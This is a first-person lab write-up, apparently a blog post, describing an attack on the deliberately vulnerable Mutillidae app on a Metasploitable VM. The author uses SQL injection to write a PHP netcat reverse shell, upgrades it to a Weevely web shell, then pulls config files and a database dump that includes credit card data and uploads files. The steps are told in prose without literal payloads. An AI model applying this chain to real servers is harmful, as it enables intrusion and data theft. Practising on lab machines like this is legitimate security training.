My Experience on Gaining Access to a Linux Metasploitable Server through an SQLi on Mutillidae And The Post Exploitation Process

Summary

I have initially gathered a reverse bash connection from the Linux Metasploitable server via SQL injection on a website called Mutillidae hosted on this server. Then I escalated this reverse shell to Weevely shell. Then in the post-exploitation process, I have run various Weevely commands with different vectors in order to bypass limited privileges. I have also downloaded files from the target web server and uploaded files to the target web server as well. I have carried out all the work by setting up my own lab and my own virtual machines (Kali Linux, Linux Metasploitable Server).

1)Gaining a Reverse Shell Connection

I have found this SQLi on a Post HTTP request, which exists at the user info section of Mutillidae. I have learned the number of columns by error and trial, with the order by command. Now, I know that 5 columns are being selected from a certain table.

I arranged my SQL command depending on 5 columns. Also by removing '?=page' section we can see where are we while browsing through the website as a user. We will need this information while we try to run our reverse shell file on the server. 

I will use Netcat to start listening to incoming connections on port 8888.

I used this command which comes after my username in the URL. I used a function called passthru which executes any command put inside the parenthesis and quotation marks. Moreover inside the parenthesis, I used Netcat, wrote the machine's address that will listen to the upcoming connections and the port that will listen to the connections which will just do reverse connection to my attacking machine. I selected other columns as null so that nothing gets written except my PHP code. I used a function called 'outfile', then I specified where I want to store that file (in this case I stored on /tmp/ directory of Mutillidae). I have named my reverse shell PHP as sarpreverse.

Now with entering this link I have stored by reverse shell PHP file to the Mutillidae's server. Now all I need to do is execute this file by browsing it through my browser. 

This is the link that I should run in the URL since I know I should return 1 time back in order to reach the tmp directory since I learned where exactly I am by deleting ?page section in the URL, and I have stored my sarpreverse.php file to tmp directory.

As it can be seen I have managed to get a reverse connection from the Linux Metasploitable Server.

2) Escalating Reverse Shell To the Weevely Shell

I will generate the Weevely code in txt first. I will then convert it to PHP once I managed to upload this Weevely file to the server, until that point it should stay as PHP otherwise I could not download this file from the server including its source code. In order to operate Weevely properly source code is needed.

I uploaded this file which should be accessible by the Linux Metasploitable Machine and by my Kali Machine on the internet. Since I use my own local network, I have uploaded it on the local webserver of the Kali. It can be uploaded to any public website on the internet as well.

Now I need the download this file to the metasploitable machine from my reverse connection. 

By typing pwd we can see where this file is stored in Mutillidae, so while escalating to Weevely we can use this link.

Now after the download process I can change the extension of the file to PHP in order to execute Weevely Shell.

Now I can connect to my Weevely Shell.

3)Post Exploitation

3.1)Executing Shell Commands with Vectors/Bypassing Privileges

The first thing that I will look at is the information about the system.

I can see the folder where the shell is located IP, the client IP, OS, the kernel version which will be useful for increasing the privileges, we can see the version of PHP which will be useful when I try to bypass functions, the user that we are pretending.

I will run a function called 'audit_ectpasswd' which has a similar function to cat /etc/password ( This command gives me users on the current operating system and their locations where document root is. It can be used to navigate within the server and go from one website to another). The reason why I am using 'audit_etcpasswd' in many websites which are finely secured, I could not run cat /etc/password command. But thanks to 'audit_etcpasswd' function I could try different vectors to run this command.

I tried the file vector first.

It did not work. Then I tried posix_getpwuid. 

It worked as it can be seen thanks to this function we can try different vectors until this command works. In some situations, we may face permission denied and we can't run the commands as we wanted to on the server. Because the server may be configured in a way that prevents us from running commands on that server. We are going to use a function that comes with Weevely, the function we will use will be shell_sh.

The way that we should use this function is displayed above.

3.2)Downloading Files From the Target Webserver

Now I could download files from the target webserver. Let's look at the files.

My main focus will be on the config file in this situation since config files hold crucial information about connecting to the database. 

So let's try shell_sh with vector system. In higher security levels I may face permission denials with default shell commands so I tried shell_sh with the system vector.

In order to download the config file to my attacking machine, I need to use file_download function.

The parameters that are used in this command is the name of the function, the vector, the rpath(I wrote config.inc since I am currently at the directory where config file is stored), and the lpath which stands for the place that I will download the file on the machine that I connected to the server.

As you can see it is downloaded on my root server. Let's open the config file of Mutillidae.

This information is very useful for me if I want to connect the database of Mutillidae (accounts, usernames, passwords, etc.)

3.2)Accessing the Database of the Web Application

I will use the information in the config file with the sql_dump command. This command will allow me to download and open the database of Mutillidae, read the data and modify it with the text editor.

So I wrote first the name of the function the method that I gather the data (vector), the name of the database host which is localhost, the lpath where I will save the database, and the name of the database, user, and the password.

As you can see all of the information that is included in the database can be seen in plain text. 

The table for credit_cards can be reached as well.

3.3) Uploading Files to the Target Webserver

Uploading files can be really useful. We can literally upload any file that we want, any PHP script, we can use a PHP script to execute commands on the server, get a reverse connection, connect to the database, and browse through the files.

As it can be seen we can upload any type of file to these files since the current website is running under www-data. So basically I can do anything I want on this website because I am the owner of this website. I may just upload the file by file_upload command.

As it can be seen sarpshell-uploaded.txt file is stored at Linux Metasplotiable's (Mutillidae's Webserver) /var/www/mutillidae directory.

In a lot of cases depending on how we gained access to the website, our privileges might be nobody. So when we type whoami instead of getting www-data we will be nobody. And when we are nobody we can't upload files anywhere we want. We can only upload to directories that have 7777 permissions. So to directories that basically allow anybody to upload to them. They should look like drwxrwxrwx.

As it can be seen any user can be upload any file to dav file.

I wanted to show this available option to upload files to the server if we do not have permission to upload files to the target webserver.